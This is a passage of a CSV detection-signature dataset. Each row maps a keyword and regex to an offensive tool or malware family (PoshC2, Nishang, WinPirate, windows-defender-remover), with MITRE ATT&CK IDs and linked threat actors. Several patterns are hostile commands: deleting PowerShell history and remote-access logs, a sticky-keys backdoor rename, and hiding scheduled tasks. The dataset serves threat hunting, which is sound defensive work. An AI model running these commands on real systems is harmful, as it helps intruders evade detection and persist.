"*RemovalofAnti-PhishingServices.reg*",".{0,1000}RemovalofAnti\-PhishingServices\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57070"
"*RemovalofWindowsDefenderAntivirus.reg*",".{0,1000}RemovalofWindowsDefenderAntivirus\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57071"
"*Remove_Privilege /Process:* /Privilege:*",".{0,1000}Remove_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","57072"
"*Remove_SecurityComp.reg*",".{0,1000}Remove_SecurityComp\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57073"
"*RemoveDefenderTasks.reg*",".{0,1000}RemoveDefenderTasks\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57085"
"*removeexe-persistence*",".{0,1000}removeexe\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57086"
"*Remove-Item (Get-PSreadlineOption).HistorySavePath -Force -ErrorAction SilentlyContinue*",".{0,1000}Remove\-Item\s\(Get\-PSreadlineOption\)\.HistorySavePath\s\-Force\s\-ErrorAction\sSilentlyContinue.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","57087"
"*Remove-Item (Get-PSreadlineOption).HistorySavePath*",".{0,1000}Remove\-Item\s\(Get\-PSreadlineOption\)\.HistorySavePath.{0,1000}","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","57088"
"*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*",".{0,1000}Remove\-Item\s.{0,1000}C\:\\Program\sFiles.{0,1000}\\TeamViewer\\TeamViewer.{0,1000}_Logfile\.log.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57089"
"*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*",".{0,1000}Remove\-Item\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57090"
"*Remove-Item -Path *\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt*",".{0,1000}Remove\-Item\s\-Path\s.{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","57095"
"*Remove-ItemProperty *HKLM:\SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\* -Name *SD*",".{0,1000}Remove\-ItemProperty\s.{0,1000}HKLM\:\\SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\s\-Name\s.{0,1000}SD.{0,1000}","offensive_tool_keyword","powershell","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","Tarrask Malware","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","#registry","risk of False positive","9","10","N/A","N/A","N/A","N/A","57096"
"*Remove-KeePassConfigTrigger*",".{0,1000}Remove\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","57100"
"*RemoveKeePassTrigger.ps1*",".{0,1000}RemoveKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","57101"
"*RemoveKeePassTrigger.ps1*",".{0,1000}RemoveKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","57102"
"*Remove-KeeThiefLurker *",".{0,1000}Remove\-KeeThiefLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","57103"
"*Remove-Module -Name PsReadline*",".{0,1000}Remove\-Module\s\-Name\sPsReadline.{0,1000}","offensive_tool_keyword","powershell","removing powershell console logging to avoid detection","T1070.004 - T1086 - T1562.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57104"
"*remove-persistence*",".{0,1000}remove\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57105"
"*Remove-Persistence.ps1*",".{0,1000}Remove\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57106"
"*Remove-Persistence.ps1*",".{0,1000}Remove\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57107"
"*remove-persistence-cron*",".{0,1000}remove\-persistence\-cron.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57108"
"*Remove-PoshRat*",".{0,1000}Remove\-PoshRat.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57109"
"*Remove-PoshRat.ps1*",".{0,1000}Remove\-PoshRat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57110"
"*removeRegTrace*",".{0,1000}removeRegTrace.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","57111"
"*RemoverofDefenderContextMenu.reg*",".{0,1000}RemoverofDefenderContextMenu\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57112"
"*RemoveSecHealthApp.ps1*",".{0,1000}RemoveSecHealthApp\.ps1.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57113"
"*RemoveSecurityandMaintenance.reg*",".{0,1000}RemoveSecurityandMaintenance\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57114"
"*RemoveShellAssociation.reg*",".{0,1000}RemoveShellAssociation\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57115"
"*RemoveSignatureUpdates.reg*",".{0,1000}RemoveSignatureUpdates\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57116"
"*Remove-SQLC2Agent*",".{0,1000}Remove\-SQLC2Agent.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","57117"
"*Remove-SQLC2Command*",".{0,1000}Remove\-SQLC2Command.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","57118"
"*Remove-TemplateLurker -EventName *",".{0,1000}Remove\-TemplateLurker\s\-EventName\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","57119"
"*Remove-Update.ps1*",".{0,1000}Remove\-Update\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57120"
"*Remove-VolumeShadowCopy*",".{0,1000}Remove\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","57121"
"*RemoveWindowsDefenderFirewallRules.reg*",".{0,1000}RemoveWindowsDefenderFirewallRules\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57122"
"*RemoveWindowsWebThreat.reg*",".{0,1000}RemoveWindowsWebThreat\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57123"
"*ren sethc.exe sethcbad.exe*",".{0,1000}ren\ssethc\.exe\ssethcbad\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","57127"
"*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","57130"
"*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","57131"
"*renameMachine.py -current-name * -new-name * -dc-ip * *:*",".{0,1000}renameMachine\.py\s\-current\-name\s.{0,1000}\s\-new\-name\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57133"
"*renameMachine.py -current-name * -new-name*",".{0,1000}renameMachine\.py\s\-current\-name\s.{0,1000}\s\-new\-name.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57134"
"*replace_key_iv_shellcode*",".{0,1000}replace_key_iv_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","57135"
"*replace_video_fake_plugin*",".{0,1000}replace_video_fake_plugin.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","57136"
"*Replacing /etc/dhcp/dhcpd.conf with no route push config*",".{0,1000}Replacing\s\/etc\/dhcp\/dhcpd\.conf\swith\sno\sroute\spush\sconfig.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#linux","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","57137"
"*repository.su/blackarch/*/os/*",".{0,1000}repository\.su\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","57138"
"*RePRGM/Nimperiments*",".{0,1000}RePRGM\/Nimperiments.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","57139"
"*RequestAADRefreshToken.exe*",".{0,1000}RequestAADRefreshToken\.exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","57140"
"*RequestAsPython-PowerShell.py*",".{0,1000}RequestAsPython\-PowerShell\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. and PowerShell Invoke-WebRequest.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","57141"
"*Requesting meterpreter payload from https://*",".{0,1000}Requesting\smeterpreter\spayload\sfrom\shttps\:\/\/.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","57142"
"*Requesting S4U2Proxy*",".{0,1000}Requesting\sS4U2Proxy.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57143"
"*Requesting S4U2self*",".{0,1000}Requesting\sS4U2self.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57144"
